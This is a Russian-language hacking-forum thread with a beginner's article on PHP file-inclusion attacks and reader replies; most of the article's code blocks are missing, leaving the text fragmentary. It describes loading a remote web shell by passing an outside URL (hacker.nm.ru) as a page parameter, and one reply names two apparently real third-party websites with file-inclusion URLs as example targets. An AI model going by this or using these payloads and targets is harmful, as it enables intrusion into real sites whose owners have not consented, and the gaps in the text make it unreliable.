![]() |
php injection
Дело было вечером, делать было нечего… А сидеть в мирке с укуреными было неохота как-то… Вот решил построчить немного. Знаю что подобных статей, больше чем мне дней, но все же, свое это свое.
Сразу хочу сказать, что если вы не новичок, то можете не читать далее. Else, то читаем. Php инъекция являются, наверно, самым распространенным, после sql-inj, багом. И так , сама суть: Есть код: PHP код:
Сразу вместо shop пишет dsdsds и смотрит на результат.Он будет примерно таким: Цитата:
Идем дальше, есть код типа: PHP код:
Третий тип: PHP код:
Ничего не мешает. Создаем, и уже пишем index.php?patch=http://hacker.nm.ru/ И о чудо, мы снова видим там свой шелл : Теперь, как избежать этого. Случай первый: PHP код:
PHP код:
PHP код:
|
_http://www.beta-bedrijvendagen.nl/main.php?file=../main.php
_http://www.compendiuminc.com/main.php?file= к примеру;) |
Теперь, когда вы так много знаете, я расскажу вам как правильно кушать ложкой.
Примерно тоже самое, что и эта статья. Green_beear молодец конечно, но не туда по-мойму труд ты свой прикладываешь немного. К новому году, по словам Егорыча великого и ужасного, будет опубликована достаточно полная статья по теме на античате, так что не делайте полуфабрикатов =) |
Zadoxlik, ну простые и не очень смертные не в курсе какие планы у вас с Егорычем.. =) Инициатива приветствуется)). Думаю, здесь осуждать не имеет смысла, беспочвенно).
|
Статейка просто супер. Мне понравился но вот только во многих сайтах это не проходит, например я пишу в место index.php?page=shop , index.php?page=xernya а страничка вообще не реагирует на ошибочный запрос ...было бы лучше если бы вы обяснили как тогда действовать
|
статья нормально, так как на ачате еще не писали, пусть будет в библиотеке, но нету приложений в виде простенького кода шелла.
|
Тут кроме Белого Джордана об этой теме писать не могут. Ты не найдешь ни единой статьи об хсс кроме статей Алгола.
|
Просто об ней уже все написано
|
Простая статья что такого ужасного написали грин бир молодец что такого?
|
Цитата:
|
| Время: 12:08 |